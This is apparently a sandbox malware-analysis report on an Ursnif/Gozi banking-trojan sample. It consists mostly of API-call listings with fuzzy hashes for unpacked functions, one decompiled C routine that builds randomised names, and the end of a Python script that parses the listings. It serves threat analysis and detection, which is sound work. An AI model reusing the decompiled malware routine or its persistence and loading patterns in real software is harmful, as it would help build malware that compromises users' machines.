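if __name__ == "__main__":
    for fn in parse(SAMPLE):
        print(fn.fuzzy_hash[:16], behaviour_tags(fn), creation_flags(fn))
```

Feeding the script the whole section (copy the listings into a text file and call `parse` on its contents) gives one record per function; the fuzzy hashes are the useful pivot for matching the same routine across other Ursnif/Gozi unpacked dumps, and the decoded flags show that the child process in the CreateProcessA listing is started with no console window and default error mode.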

                                          APIs
                                          • lstrlenW.KERNEL32(?,00000000,?,?,?,00B5CE9C,?,?), ref: 00B60F1E
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,00B5CE9C,?,?), ref: 00B60F47
                                          • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 00B60F67
                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 00B60F83
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F8F
                                          • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,00B5CE9C,?,?), ref: 00B60F92
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F9E
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B60FBB
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B60FD5
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B60FEB
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B61001
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B61017
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B6102D
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,00B5CE9C,?,?), ref: 00B61056
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                          • String ID:
                                          • API String ID: 3772355505-0
                                          • Opcode ID: fa46f017ddb8060b04e95f6f6bd1e4b5ebf009654e71fb056a63ee10af337a07
                                          • Instruction ID: 809a2b4394e910fe7ed7611e1861b9be6da3e7e7d3ddc79b14a0d6d60e6e1eff
                                          • Opcode Fuzzy Hash: fa46f017ddb8060b04e95f6f6bd1e4b5ebf009654e71fb056a63ee10af337a07
                                          • Instruction Fuzzy Hash: C73108B150420BAFEB109F68DC84E677BECEF04345B054866E909D7661DF3AED94CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54D3F
                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54D4A
                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54D52
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B54D67
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B54D78
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B54D8A
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54D8F
                                          • lstrcatW.KERNEL32(00000000,00B743E0), ref: 00B54D9B
                                          • lstrcatW.KERNEL32(00000000), ref: 00B54DA4
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54DA9
                                          • lstrcatW.KERNEL32(00000000,00B743E0), ref: 00B54DB5
                                          • lstrcatW.KERNEL32(00000000,00000002), ref: 00B54DD1
                                          • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54DD9
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54DE7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                          • String ID:
                                          • API String ID: 3635185113-0
                                          • Opcode ID: e178b23c5a4efb74682f0af954879f9a08bd631c1cbbc981bd60e493b4983c78
                                          • Instruction ID: e3e7ae8a888770f5ef334d3db51bb4cc0910f669798d7e915ad9292e86881e54
                                          • Opcode Fuzzy Hash: e178b23c5a4efb74682f0af954879f9a08bd631c1cbbc981bd60e493b4983c78
                                          • Instruction Fuzzy Hash: 2321A132141215AFD3216B64EC85F7FBBBCEF85B56F01046EFA0993160CF609C859B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC12
                                          • TlsAlloc.KERNEL32 ref: 00B5BC1C
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC45
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC53
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC61
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC6F
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC7D
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC8B
                                          • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 00B5BCB5
                                          • HeapFree.KERNEL32(00000000,?,?,?,0000000C,00000000), ref: 00B5BD36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load$Library$AllocDll@4FreeHeapImports
                                          • String ID: ~
                                          • API String ID: 1792504554-1707062198
                                          • Opcode ID: 54d25d670917c9d916fb1bc4ba422b78bc887b3f4a577043be5f9fe4c192badf
                                          • Instruction ID: 1538e142521ed5bd3fbf50896b23574d572785f1ebb3d7d72a142d0765ff0e0a
                                          • Opcode Fuzzy Hash: 54d25d670917c9d916fb1bc4ba422b78bc887b3f4a577043be5f9fe4c192badf
                                          • Instruction Fuzzy Hash: 0C418B71900209EFDB14EFA8DC88E9977FCEB48301B5544E6E909EB660DB71AD89CB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B629F2: memset.NTDLL ref: 00B62A14
                                            • Part of subcall function 00B629F2: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00B62ABE
                                          • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 00B56178
                                          • CloseHandle.KERNEL32(?), ref: 00B56184
                                          • PathFindFileNameW.SHLWAPI(?), ref: 00B56194
                                          • lstrlenW.KERNEL32(00000000), ref: 00B5619D
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B561AE
                                          • wcstombs.NTDLL ref: 00B561BD
                                          • lstrlen.KERNEL32(?), ref: 00B561CA
                                          • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 00B56209
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5621C
                                          • DeleteFileW.KERNEL32(?), ref: 00B56229
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                          • String ID: v
                                          • API String ID: 2256351002-1801730948
                                          • Opcode ID: 87ef4a7876a7c0e089849eba19ea70bb972926a8c30aae415ea735ad422fc443
                                          • Instruction ID: e50a995e0a905b50c8f4df6c180cbbd39a3c6937a92808e64484dbde35aeaf35
                                          • Opcode Fuzzy Hash: 87ef4a7876a7c0e089849eba19ea70bb972926a8c30aae415ea735ad422fc443
                                          • Instruction Fuzzy Hash: C8314031A01108ABDB219FA5DC49E9F7FB9EF85312F4040A5FA0AA3160DF318D99DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B5984B: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B59890
                                            • Part of subcall function 00B5984B: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B598A8
                                            • Part of subcall function 00B5984B: WaitForSingleObject.KERNEL32(00000000,?,00000000,?), ref: 00B59970
                                            • Part of subcall function 00B5984B: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B59999
                                            • Part of subcall function 00B5984B: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B599A9
                                            • Part of subcall function 00B5984B: RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00B599B2
                                          • lstrcmp.KERNEL32(?,?), ref: 00B6B2D9
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6B305
                                          • GetCurrentThreadId.KERNEL32 ref: 00B6B3B6
                                          • GetCurrentThread.KERNEL32 ref: 00B6B3C7
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,Function_0000121A,?,00000001), ref: 00B6B404
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,Function_0000121A,?,00000001), ref: 00B6B418
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B6B426
                                          • wsprintfA.USER32 ref: 00B6B43E
                                            • Part of subcall function 00B65B7E: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,00B64325,00000000,00000000,00000000,00000000,00000000,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B65B88
                                            • Part of subcall function 00B65B7E: lstrcpy.KERNEL32(00000000,00000000), ref: 00B65BAC
                                            • Part of subcall function 00B65B7E: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B65BB3
                                            • Part of subcall function 00B65B7E: lstrcat.KERNEL32(00000000,?), ref: 00B65C0A
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B6B449
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B6B460
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B6B471
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6B47D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                          • String ID:
                                          • API String ID: 773763258-0
                                          • Opcode ID: b9bd528eba08ade43de67d3225b9525dfe5a43ffd80d4a52937fee8d9084117c
                                          • Instruction ID: 1b9dd558acd3c0ffe5c892f08ff1951e8ea286dac9e5aa31f5cc8decfabf832b
                                          • Opcode Fuzzy Hash: b9bd528eba08ade43de67d3225b9525dfe5a43ffd80d4a52937fee8d9084117c
                                          • Instruction Fuzzy Hash: FF71E271900119EFCB11DFA5DC89EAEBBF9FF08310F1480A5E609E7220DB35A995DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(00000000,76D85520,?,00000000,?,?,?), ref: 00B6779B
                                          • lstrlen.KERNEL32(?), ref: 00B677A3
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B677B3
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B677D2
                                          • lstrlen.KERNEL32(?), ref: 00B677E7
                                          • lstrlen.KERNEL32(?), ref: 00B677F5
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 00B67843
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00B67867
                                          • lstrlen.KERNEL32(?), ref: 00B6789A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00B678C5
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00B678DC
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00B678E9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                          • String ID:
                                          • API String ID: 904523553-0
                                          • Opcode ID: 00b18a22cb8e28c8b38ebd19310fe0d2c3f6629f6025254b9320986c7bfed969
                                          • Instruction ID: ffc62a38c5208516a1b7bb0eb06c15e3ad269bb49ee859059c34428dc3389ccc
                                          • Opcode Fuzzy Hash: 00b18a22cb8e28c8b38ebd19310fe0d2c3f6629f6025254b9320986c7bfed969
                                          • Instruction Fuzzy Hash: 9A417C7290020AEFDF119F65CC88AAE7BB9FF44314F1044A5F90997260DF34AD51DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlImageNtHeader.NTDLL(?), ref: 00B62047
                                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,00B70300,00000094,00000000,00000000,?), ref: 00B6205F
                                          • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00B6206E
                                          • GetTempPathA.KERNEL32(00000001,00000000,?,?,00B70300,00000094,00000000,00000000,?), ref: 00B62081
                                          • GetTickCount.KERNEL32 ref: 00B62085
                                          • wsprintfA.USER32 ref: 00B6209C
                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00B620D7
                                          • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 00B620F7
                                          • lstrlen.KERNEL32(00000000), ref: 00B62101
                                          • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 00B62111
                                          • RegCloseKey.ADVAPI32(?), ref: 00B6211D
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 00B6212B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                          • String ID:
                                          • API String ID: 3778301466-0
                                          • Opcode ID: ed8ec048a6d7fb22dfb29e5461519d8a95ad91103ce84de451af0d60b733eba8
                                          • Instruction ID: f3abc0ada8c3ada660d21d6e049ec684555713661d5779bca412dd8bf8bc666a
                                          • Opcode Fuzzy Hash: ed8ec048a6d7fb22dfb29e5461519d8a95ad91103ce84de451af0d60b733eba8
                                          • Instruction Fuzzy Hash: 54314971405119FFEB119FA0EC8CDAB3BADEF46355B004065FA0AE7220DB358E91DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00B615D4
                                          • GetCurrentThreadId.KERNEL32 ref: 00B615EA
                                          • GetCurrentThread.KERNEL32 ref: 00B615FB
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                            • Part of subcall function 00B64309: lstrlen.KERNEL32(00000000,00000001,00000000,?,?,00000001,00000000,00000000,00000000,00000000,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B64374
                                            • Part of subcall function 00B64309: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000001,00000000,00000000,00000000,00000000,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B6439C
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00B61675
                                          • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00B61681
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B616D0
                                          • wsprintfA.USER32 ref: 00B616E8
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B616F3
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B6170A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                          • String ID: W
                                          • API String ID: 630447368-655174618
                                          • Opcode ID: 3cbdd44da066b4824926af868c2dc42868f4e461a64b8b4387c13339c23a857e
                                          • Instruction ID: 393b5c231ab255fbb142e284c7dd404995605a655ce7fea8c7feec034c9f6bfd
                                          • Opcode Fuzzy Hash: 3cbdd44da066b4824926af868c2dc42868f4e461a64b8b4387c13339c23a857e
                                          • Instruction Fuzzy Hash: 5F414675900119FFDF11DFA5DC88DAE7BF9EF09740B0844A5F909A3260DB398A90DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B53F4B
                                            • Part of subcall function 00B5B0A5: RegCloseKey.ADVAPI32(?), ref: 00B5B12C
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B53F86
                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 00B53FE8
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B53FFD
                                          • lstrcpyW.KERNEL32(?), ref: 00B54017
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B54026
                                            • Part of subcall function 00B5E793: lstrlenW.KERNEL32(?,00000000,?,00B54045,00000000,?), ref: 00B5E7A6
                                            • Part of subcall function 00B5E793: lstrlen.KERNEL32(?,?,00B54045,00000000,?), ref: 00B5E7B1
                                            • Part of subcall function 00B5E793: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00B5E7C6
                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 00B54090
                                            • Part of subcall function 00B65F3B: lstrlenW.KERNEL32(?,74DB06E0,00B72F1B,80000001,?,?,00B5C229,?,?,00B540AD,00000000,?,00000000,?), ref: 00B65F47
                                            • Part of subcall function 00B65F3B: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,00B5C229,?,?,00B540AD,00000000,?,00000000,?), ref: 00B65F6F
                                            • Part of subcall function 00B65F3B: memset.NTDLL ref: 00B65F81
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 00B540C5
                                          • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 00B540D0
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B540E6
                                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 00B540F8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                          • String ID:
                                          • API String ID: 1430934453-0
                                          • Opcode ID: a6a516a3977bd6b39c63965a7cffd75314702438c6813a4bdd4be280788aad24
                                          • Instruction ID: bc4cc236193cd329678e3ecb2c7f2d28064752a187652b01e7ae5b404162aef7
                                          • Opcode Fuzzy Hash: a6a516a3977bd6b39c63965a7cffd75314702438c6813a4bdd4be280788aad24
                                          • Instruction Fuzzy Hash: 3D517D71500109FFDB119BA4DC84EAA7BFDEF08305F2505A5FA09E32A0DB359A95DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 55%
                                          			E048926E7(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				WCHAR* _v24;
                                          				signed int _v28;
                                          				intOrPtr _v32;
                                          				void* __edi;
                                          				void* __esi;
                                          				WCHAR* _t58;
                                          				signed int _t60;
                                          				signed int _t62;
                                          				intOrPtr _t64;
                                          				intOrPtr _t66;
                                          				intOrPtr _t70;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          				WCHAR* _t80;
                                          				WCHAR* _t83;
                                          				void* _t84;
                                          				void* _t85;
                                          				void* _t86;
                                          				intOrPtr _t92;
                                          				signed int _t103;
                                          				void* _t104;
                                          				intOrPtr _t105;
                                          				void* _t107;
                                          				intOrPtr* _t115;
                                          				void* _t119;
                                          				WCHAR* _t125;
                                          
                                          				_t58 =  *0x489a3dc; // 0x5249c48
                                          				_v24 = _t58;
                                          				_v28 = 8;
                                          				_v20 = GetTickCount();
                                          				_t60 = E048959CA();
                                          				_t103 = 5;
                                          				_t98 = _t60 % _t103 + 6;
                                          				_t62 = E048959CA();
                                          				_t117 = _t62 % _t103 + 6;
                                          				_v32 = _t62 % _t103 + 6;
                                          				_t64 = E04894B8D(_t60 % _t103 + 6);
                                          				_v16 = _t64;
                                          				if(_t64 != 0) {
                                          					_t66 = E04894B8D(_t117);
                                          					_v12 = _t66;
                                          					if(_t66 != 0) {
                                          						_push(5);
                                          						_t104 = 0xa;
                                          						_t119 = E04894480(_t104,  &_v20);
                                          						if(_t119 == 0) {
                                          							_t119 = 0x489918c;
                                          						}
                                          						_t70 = E048922D6(_v24);
                                          						_v8 = _t70;
                                          						if(_t70 != 0) {
                                          							_t115 = __imp__;
                                          							_t72 =  *_t115(_t119);
                                          							_t75 =  *_t115(_v8);
                                          							_t76 =  *_t115(_a4);
                                          							_t80 = E04894DF6(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                                          							_v24 = _t80;
                                          							if(_t80 != 0) {
                                          								_t105 =  *0x489a348; // 0x9ad5a8
                                          								_t28 = _t105 + 0x489bb08; // 0x530025
                                          								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                                          								_push(4);
                                          								_t107 = 5;
                                          								_t83 = E04894480(_t107,  &_v20);
                                          								_a8 = _t83;
                                          								if(_t83 == 0) {
                                          									_a8 = 0x4899190;
                                          								}
                                          								_t84 =  *_t115(_a8);
                                          								_t85 =  *_t115(_v8);
                                          								_t86 =  *_t115(_a4);
                                          								_t125 = E04894DF6(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                                          								if(_t125 == 0) {
                                          									E04894C73(_v24);
                                          								} else {
                                          									_t92 =  *0x489a348; // 0x9ad5a8
                                          									_t44 = _t92 + 0x489bc80; // 0x73006d
                                          									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                                          									 *_a16 = _v24;
                                          									_v28 = _v28 & 0x00000000;
                                          									 *_a20 = _t125;
                                          								}
                                          							}
                                          							E04894C73(_v8);
                                          						}
                                          						E04894C73(_v12);
                                          					}
                                          					E04894C73(_v16);
                                          				}
                                          				return _v28;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 048926FF
                                          • lstrlen.KERNEL32(00000000,00000005), ref: 04892780
                                          • lstrlen.KERNEL32(?), ref: 04892791
                                          • lstrlen.KERNEL32(00000000), ref: 04892798
                                          • lstrlenW.KERNEL32(80000002), ref: 0489279F
                                          • wsprintfW.USER32 ref: 048927E5
                                          • lstrlen.KERNEL32(?,00000004), ref: 04892808
                                          • lstrlen.KERNEL32(?), ref: 04892811
                                          • lstrlen.KERNEL32(?), ref: 04892818
                                          • lstrlenW.KERNEL32(?), ref: 0489281F
                                          • wsprintfW.USER32 ref: 04892856
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 822878831-0
                                          • Opcode ID: fecbbcff8ff52af4212fad598d5809838deac772b05bd7a5c72131bb073c3353
                                          • Instruction ID: 51ee936d0edbfad4c0e520e8496b4acdd1c50314654cf628f78d5d1f116da712
                                          • Opcode Fuzzy Hash: fecbbcff8ff52af4212fad598d5809838deac772b05bd7a5c72131bb073c3353
                                          • Instruction Fuzzy Hash: 7E51BB72D00A19BBDF12AFA8DC04ADE7BB5EF04318F094A64E904E7210DB75EE11DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 00B59F04
                                          • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 00B59F19
                                          • RegCreateKeyA.ADVAPI32(80000001,?), ref: 00B59F41
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B59F82
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B59F92
                                          • RtlAllocateHeap.NTDLL(00000000,00B6782C), ref: 00B59FA5
                                          • RtlAllocateHeap.NTDLL(00000000,00B6782C), ref: 00B59FB4
                                          • HeapFree.KERNEL32(00000000,00000000,?,00B6782C,00000000,?,?,?), ref: 00B59FFE
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B6782C,00000000,?,?,?,?), ref: 00B5A022
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00B6782C,00000000,?,?,?), ref: 00B5A047
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00B6782C,00000000,?,?,?), ref: 00B5A05C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$Allocate$CloseCreate
                                          • String ID:
                                          • API String ID: 4126010716-0
                                          • Opcode ID: 168de0ae04b3fda3753ed381b15a37884347ba08bd811ffe69b24f552265ff79
                                          • Instruction ID: 1ddc5d175126aa4b01bec5e4c59fa2508eae214ae1124955c0518dd0847d810f
                                          • Opcode Fuzzy Hash: 168de0ae04b3fda3753ed381b15a37884347ba08bd811ffe69b24f552265ff79
                                          • Instruction Fuzzy Hash: 8E51B375810209EFDF119FA4DC849EEBBB9FB08355F1444AAEA09B2220D7315E98DF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PathFindFileNameW.SHLWAPI(?), ref: 00B669FB
                                          • PathFindFileNameW.SHLWAPI(?), ref: 00B66A11
                                          • lstrlenW.KERNEL32(00000000), ref: 00B66A54
                                          • RtlAllocateHeap.NTDLL(00000000,00B72F1D), ref: 00B66A6A
                                          • memcpy.NTDLL(00000000,00000000,00B72F1B), ref: 00B66A7D
                                          • _wcsupr.NTDLL ref: 00B66A89
                                          • lstrlenW.KERNEL32(?,00B72F1B), ref: 00B66AC2
                                          • RtlAllocateHeap.NTDLL(00000000,?,00B72F1B), ref: 00B66AD7
